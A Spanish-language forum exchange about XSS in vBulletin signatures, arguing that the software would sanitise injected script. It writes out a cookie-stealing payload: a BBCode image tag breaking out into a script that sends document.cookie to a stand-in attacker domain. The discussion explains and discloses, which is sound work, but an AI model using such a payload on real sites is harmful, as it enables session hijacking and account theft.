haces un redirect con con la cookie del usuario... si es un simple foro no robas mucho, pero si es la web de xbox o así ?
Ya lo sé, pero lo que estoy diciendo es que en el ejemplo de vB no hay manera de sacar esa cookie. Si por ejemplo yo pongo en mi firma:
Código:
[IMAGEN]http://unaimagen.com/"><script>window.location.href='http://givemeyourcookies.es/?c='+document.cookie;</script>[/IMAGEN]
Donde [IMAGEN] hace referencia al tag de BBCode de vB. vB me transformará ese código en lo siguiente:
HTML:
<img src="http://unaimagen.com/"><script>window.location.href='http://givemeyourcookies.es/?c='+document.cookie;</script>" border="0" alt="" />
Así obviamente con demás inputs etc, estaría cojonudo pagar un script de $200 y que viniera sin sanitizar algo tan básico xD
Hace nada reporté a alguien de esta web vulnerabilidades XSS y CSRF, en la web no se validaba ningún tipo de dato introducido por el usuario, te podías llamar en la web espacios
literalmente, así como cualquier nombre hasta la longitud máxima de típica tabla `VARCHAR(255)` de la BD, si tu nombre y apellidos eran más de 255 caracteres de longitud se te recortaba el nombre sin decirte nada xD así que inyecté varias veces scripts para mostrar la vulnerabilidad, la solución después de insistir fue algo como strip_tags() xDD, pero en scripts ya sea open_source como de pago estos casos si existen son muy puntuales/enrevesados y en cuanto se saben no duran un día más sin corregirse generalmente